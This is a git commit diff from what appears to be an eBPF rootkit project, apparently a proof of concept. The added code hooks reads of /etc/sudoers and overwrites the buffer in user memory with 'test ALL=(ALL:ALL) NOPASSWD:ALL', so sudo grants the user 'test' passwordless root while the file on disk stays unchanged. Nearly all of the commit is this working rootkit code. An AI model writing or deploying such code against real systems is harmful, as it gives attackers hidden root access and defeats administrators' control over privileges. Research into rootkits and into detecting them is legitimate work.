Completed faking that an user is in the sudoers file. Now user 'test' can use sudo without being there

2025-12-20 16:53:07 +08:00 · 2022-02-05 14:10:12 -05:00
parent 643783004a
commit 41ef733520
5 changed files with 1378 additions and 1251 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/common/constants.h
+++ b/src/common/constants.h
@@ -15,5 +15,7 @@
 #define STRING_FS_SUDO_TASK_LEN 5
 #define STRING_FS_SUDOERS_FILE "/etc/sudoers"
 #define STRING_FS_SUDOERS_FILE_LEN 13
+#define STRING_FS_SUDOERS_ENTRY "test ALL=(ALL:ALL) NOPASSWD:ALL #"
+#define STRING_FS_SUDOERS_ENTRY_LEN 34

 #endif
--- a/src/ebpf/include/bpf/fs.h
+++ b/src/ebpf/include/bpf/fs.h
@@ -91,12 +91,26 @@ static __always_inline int handle_tp_sys_exit_read(struct sys_read_exit_ctx *ctx
    char msg_original[] = STRING_FS_HIDE;
    char msg_overwrite[] = STRING_FS_OVERWRITE;
    char c_buf[sizeof(msg_overwrite)] = {0};
+
+    char sudo_line_overwrite[] = STRING_FS_SUDOERS_ENTRY;
+    char c_buf_sudo[STRING_FS_SUDOERS_ENTRY_LEN] = {0};
    
    if(buf == NULL){
        return -1;
    }
+
+    //For including an user in the sudoers file
+    //We just put our new line there, independently on what the rest of the file contains
+    if(data->is_sudo==1){
+        if(bpf_probe_write_user((void*)buf, (void*)sudo_line_overwrite, (__u32)STRING_FS_SUDOERS_ENTRY_LEN-1)<0){
+            bpf_printk("Error writing to user memory\n");
+        }
+        bpf_printk("Sudo overwritten\n");
+        return 0;
+    }
    
-#pragma unroll
+    //For PoC 2 - Modifying text read from a file
+    #pragma unroll
    for(int ii=0; ii<sizeof(msg_original)-1; ii++){
        if(bpf_probe_read_user(c_buf+ii, 1, buf+ii)<0){
            //bpf_printk("Error reading\n");